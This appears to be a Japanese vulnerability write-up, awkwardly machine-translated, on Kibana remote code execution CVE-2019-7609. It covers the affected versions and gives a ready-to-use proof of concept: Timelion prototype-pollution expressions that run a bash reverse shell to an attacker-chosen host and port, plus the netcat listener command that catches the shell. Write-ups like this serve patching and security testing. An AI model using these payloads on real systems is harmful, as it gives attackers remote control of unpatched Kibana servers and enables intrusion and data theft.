Kibanaリモートコード実行の脆弱性(CVE-2019-7609)
脆弱性の紹介
2019年2月の公式発表によると、Kibanaにはリモートコード実行の脆弱性があります.5.6.15および6.6.1より前のバージョンのKibanaには、Timelion視覚化ツールに機能上の欠陥があり、攻撃者はKibanaを使用してサーバー上で任意のコードを実行できます。Kibanaは、Elasticsearch用のオープンソースのデータ視覚化プラグインです。Elasticsearchの視覚化機能を提供します。これは、Elasticsearchインデックスに格納されているデータを検索および表示するために使用でき、さまざまなアイコン、テーブル、およびマップの形式でデータを視覚化できます。機能的に便利なため、製品開発に幅広く使用されています。
勢力圏
影響を受けるバージョン
Kibana <5.6.15 Kibana <6.6.1影響を受けない
バージョン
Kibana = 5.6.15 Kibana> = 6.6.1
POC
.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash - c \'bash -i>& /dev/tcp/You_VPS/You_VPS_Port 0>&1\'");//') ```
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/You_VPS/You_VPS_Port 0>&1");process.exit()//') ```
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
脆弱性の再発
攻撃者にncモニタリングを使用する
nc -nvlp 1234
許可されていないページを見つけて、シェルの
リバウンドを正常に実行します